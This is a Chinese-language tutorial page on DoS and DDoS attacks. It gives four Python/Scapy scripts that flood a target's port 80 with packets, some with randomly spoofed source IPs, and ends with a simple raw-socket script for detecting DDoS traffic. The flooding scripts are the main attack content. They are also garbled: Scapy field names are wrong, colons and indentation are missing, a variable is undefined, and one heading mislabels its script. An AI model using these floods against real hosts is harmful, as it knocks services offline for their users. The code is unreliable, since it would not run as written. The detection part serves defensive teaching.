📅 最后修改于: 2020-12-06 10:35:59 🧑 作者: Mango
在本章中,我们将学习DoS和DdoS攻击,并了解如何检测它们。
随着电子商务行业的蓬勃发展,Web服务器现在容易受到攻击,并且很容易成为黑客的攻击目标。黑客通常会尝试两种类型的攻击-
拒绝服务(DoS)攻击是黑客试图使网络资源不可用。它通常会暂时或无限期中断连接到Internet的主机。这些攻击通常针对托管在关键任务Web服务器上的服务,例如银行,信用卡支付网关。
网络性能异常降低。
特定网站不可用。
无法访问任何网站。
收到的垃圾邮件数量急剧增加。
长期拒绝访问Web或任何Internet服务。
特定网站不可用。
可以在数据链路,网络或应用程序层实施DoS攻击。现在让我们了解不同类型的DoS攻击&;它们在Python的实现-
使用单个IP和单个端口号将大量数据包发送到Web服务器。这是一种低级攻击,用于检查Web服务器的行为。可以在Scapy的帮助下完成在Python中的实现。以下Python脚本将帮助实现单IP单端口DoS攻击-
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
执行后,以上脚本将要求以下三件事-
源和目标的IP地址。
源端口号的IP地址。
然后它将向服务器发送大量数据包,以检查其行为。
使用单个IP并从多个端口将大量数据包发送到Web服务器。可以在Scapy的帮助下完成在Python中的实现。以下Python脚本将帮助实现单IP多端口DoS攻击-
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
使用多个IP并从单个端口号将大量数据包发送到Web服务器。可以在Scapy的帮助下完成在Python中的实现。以下Python脚本实现了单IP多端口DoS攻击-
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
使用多个IP并从多个端口将大量数据包发送到Web服务器。可以在Scapy的帮助下完成在Python中的实现。以下Python脚本有助于实现多个IP多端口DoS攻击-
Import random
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
分布式拒绝服务(DDoS)攻击是通过使来自多个来源的大量流量过载而使在线服务或网站不可用的尝试。
与拒绝服务(DoS)攻击不同,在拒绝服务(DoS)攻击中,一台计算机和一个Internet连接用于向目标资源充斥数据包,而DDoS攻击则使用许多计算机和许多Internet连接,这些攻击通常在全球范围内被称为僵尸网络。 。大规模的DDoS大规模攻击可以每秒产生数十吉比特(甚至数百吉比特)的流量。可以在https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm上详细阅读。
实际上,DDoS攻击很难检测到,因为您不知道发送流量的主机是假主机还是真实主机。下面给出的Python脚本将有助于检测DDoS攻击。
首先,让我们导入必要的库-
import socket
import struct
from datetime import datetime
现在,我们将像前面几节一样创建一个套接字。
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
我们将使用一个空字典-
dict = {}
以下代码行将打开一个文本文件,其中包含附加模式下的DDoS攻击的详细信息。
file_txt = open("attack_DDoS.txt",'a')
t1 = str(datetime.now())
在下面的代码行的帮助下,只要程序运行,就会写入当前时间。
file_txt.writelines(t1)
file_txt.writelines("\n")
现在,我们需要假设来自特定IP的点击量。这里我们假设,如果某个特定IP命中15次以上,那将是一次攻击。
No_of_IPs = 15
R_No_of_IPs = No_of_IPs +10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "The Source of the IP is:", IP
下面的代码行将检查IP是否存在于字典中。如果存在,它将增加1。
if dict.has_key(IP):
dict[IP] = dict[IP]+1
print dict[IP]
下一行代码用于删除冗余。
if(dict[IP] > No_of_IPs) and (dict[IP] < R_No_of_IPs) :
line = "DDOS attack is Detected: "
file_txt.writelines(line)
file_txt.writelines(IP)
file_txt.writelines("\n")
else:
dict[IP] = 1
运行上面的脚本后,我们将在文本文件中获得结果。根据脚本,如果IP命中次数超过15次,则将在检测到DDoS攻击以及该IP地址时将其打印出来。